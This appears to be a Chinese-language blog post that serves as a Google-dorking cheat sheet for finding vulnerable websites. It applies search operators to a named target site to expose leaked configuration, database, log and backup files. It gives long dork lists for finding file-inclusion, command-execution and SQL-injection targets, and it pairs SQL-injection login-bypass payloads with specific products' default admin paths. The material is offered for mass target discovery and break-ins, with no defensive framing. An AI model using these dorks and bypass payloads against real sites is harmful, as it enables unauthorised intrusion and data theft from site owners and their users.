Google Hacking

intitle: 从网页标题中搜索指定的关键字,可专门用来搜索指定版本名称的各类web程序,也可用allintitle

inurl: 从url中搜索指定的关键字,可专门用来构造各种形式的漏洞url,也可用allinurl

intext: 从网页中搜索指定的关键字,可专门用它来穿透到漏洞页面等……也可用allintext

filetype: 搜索指定的文件后缀,例如:sql mdb txt bak backup ini zip rar doc xls……

site: 在某个特定的网站内中搜索指定的内容

link: 搜索和该链接有关联连接,比如:友情链接

index of: 找目录遍历会用到

google所支持的一些通配符(建议选择性的用,越精确,就意味着结果越少,这样我们容易漏掉一些目标,毕竟不是正则,我们的最终目的是找到漏洞):

1
2
3
4
5
6
+ 强制包含某个字符进行查询
- 查询的时候忽略某个字符
"" 查询的时候精确匹配双引号内的字符
. 匹配某单个字符进行查询
* 匹配任意字符进行查询
| 或者,多个选择,只要有一个关键字匹配上即可

针对目标站点利用样例:

  • 目录遍历漏洞语法为: 
    site:jiebao8.top intitle:index.of
  • 配置文件泄露语法为:
    site:jiebao8.top ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini
  • 数据库文件泄露:
    site:jiebao8.top ext:sql | ext:dbf | ext:mdb
  • 日志文件泄露:
    site:jiebao8.top ext:log
  • 备份和历史文件:
    site:jiebao8.top ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
  • SQL错误:
    site:jiebao8.top intext:”sql syntax near” | intext:”syntax error has occurred” | intext:”incorrect syntax near” | intext:”unexpected end of SQL command” | intext:”Warning: mysql_connect()” | intext:”Warning: mysql_query()” | intext:”Warning: pg_connect()
  • 公开文件信息:
    site:jiebao8.top ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
  • phpinfo():
    site:jiebao8.top ext:php intitle:phpinfo “published by the PHP Group”

找到可能存在的包含和命令执行类漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
inurl:footer.inc.php?settings=
inurl:/pb_inc/admincenter/index.php?page=
inurl:/pnadmin/categories.inc.php?subpage=
inurl:/index.php??view=src/sistema/vistas/
inurl:/edit.php?em=file&filename=
inurl:/path_to_athena/athena.php?athena_dir= 远程包含
inurl:/path_to_qnews/q-news.php?id= 远程包含
inurl:/inc/backend_settings.php?cmd=
inurl:login.action strus2系列执行漏洞利用
inurl:php?x= inurl:php?open=
inurl:php?visualizar= inurl:php?pagina=
inurl:php?inc= inurl:php?include_file=
inurl:php?page= inurl:php?pg=
inurl:php?show= inurl:php?cat=
inurl:php?file= inurl:php?path_local=
inurl:php?filnavn= inurl:php?HCL_path=
inurl:php?doc= inurl:php?appdir=
inurl:php?phpbb_root_dir= inurl:php?phpc_root_path=
inurl:php?path_pre= inurl:php?nic=
inurl:php?sec= inurl:php?content=
inurl:php?link= inurl:php?filename=
inurl:php?dir= inurl:php?document=
inurl:index.php?view= inurl:.php?locate=
inurl:.php?place= inurl:.php?layout=
inurl:.php?go= inurl:.php?catch=
inurl:.php?mode= inurl:.php?name=
inurl:.php?loc= inurl:.php?f=
inurl:.php?inf= inurl:.php?pg=
inurl:.php?load= inurl:.php?naam=
allinurl:php?page= allinurl:php?file=
inurl:php?x= inurl:admin.php?cal_dir=
inurl:php?include= inurl:php?nav=
inurl:.php?sel= inurl:php?p=
inurl:php?conf= inurl:php?prefix=
inurl:theme.php?THEME_DIR=
inurl:php?lvc_include_dir=
inurl:php?basepath= inurl:php?pm_path=
inurl:php?user_inc= inurl:php?cutepath=
inurl:php?fil_config= inurl:php?libpach=
inurl:php?pivot_path= inurl:php?rep=
inurl:php?conteudo= inurl:php?root=
inurl:php?configFile inurl:php?pageurl
inurl:php?inter_url inurl:php?url=
inurl:php?cmd= inurl:path.php?my=
inurl:php?xlink= inurl:php?to=
inurl:file.php?disp=

普通cms类注入:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
inurl:article.php?ID= inurl:newsDetail.php?id=
inurl:show.php?id= inurl:newsone.php?id=
inurl:news.php?id= inurl:event.php?id=
inurl:preview.php?id= inurl:pages.php?id=
inurl:main.php?id= inurl:prod_detail.php?id=
inurl:view.php?id= inurl:product.php?id=
inurl:contact.php?Id= inurl:display_item.php?id=
inurl:item.php?id= inurl:view_items.php?id=
inurl:details.asp?id= inurl:profile.asp?id=
inurl:content.asp?id= inurl:display_item.asp?id=
inurl:view_detail.asp?ID= inurl:section.php?id=
inurl:theme.php?id= inurl:produit.php?id=
inurl:chappies.php?id= inurl:readnews.php?id=
inurl:rub.php?idr= inurl:pop.php?id=
inurl:person.php?id= inurl:read.php?id=
inurl:reagir.php?num= inurl:staff_id=
inurl:gallery.php?id= inurl:humor.php?id=
inurl:spr.php?id= inurl:gery.php?id=
inurl:profile_view.php?id=
inurl:fellows.php?id= inurl:ray.php?id=
inurl:productinfo.php?id=
inurl:file.php?cont= inurl:include.php?chapter=
inurl:principal.php?param=
inurl:general.php?menue= inurl:php?pref=
inurl:nota.php?chapter= inurl:php?str=
inurl:php?corpo= inurl:press.php?*
除了上面这些常规找注入的方式,不妨直接在网页标题或者url中搜sql语句,说不定也会有收获:
intitle:注入常用的一些sql语句,比如:常用的union,substr(),select等等……

批量搜集万能密码(属于注入的一种):

inurl:"wladmin/login.asp"
Username : '=' 'or'
Password : '=' 'or'

intext:POWERED BY Versatile Software Services 默认后台/alogin.aspx
User ==> 'or''='
Pass ==> 'or''='

inurl:/media.php?hal=login
Email: '=''or'@gmail.com
Pass: '=''or'

intext:"Powered by : Best Webmasterz." 默认后台/admin
User : '=' 'OR'
Pass : '=' 'OR'

intext:"Web Design and Maintenance by Cloud 5 Solutions" 默认后台/admin/login.php
User : '=' 'OR'
Pass : '=' 'OR'

intext:"网站设计:火龙科技" 默认后台/maintain/login.php
Username : '=' 'or'
Password : '=' 'or'

intext:"Powered by Moodyworld" 默认后台/admin/
Username : '=' 'or'
Password : '=' 'or'

site:*.tw inurl:/phpinfo.php
filetype:log "PHP Parse error"| "PHP Warning"
site:*.tw "id=" & intext:"Warning: mysql_fetch_array()
site:*.jp "id=" & intext:"Warning: getimagesize()
site:*.br "id=" & intext:"Warning: array_merge()
site:*.tw "id=" & intext:"Warning: mysql_fetch_assoc()
site:*.tw "id=" & intext:"Warning: mysql_result()
site:*.jp "id=" & intext:"Warning: pg_exec()
site:*.tw "id=" & intext:"Warning: require()
inurl:/robots.txt site:*.*

为您推荐

发表评论

电子邮件地址不会被公开。 必填项已用*标注

10 + 12 =

1条评论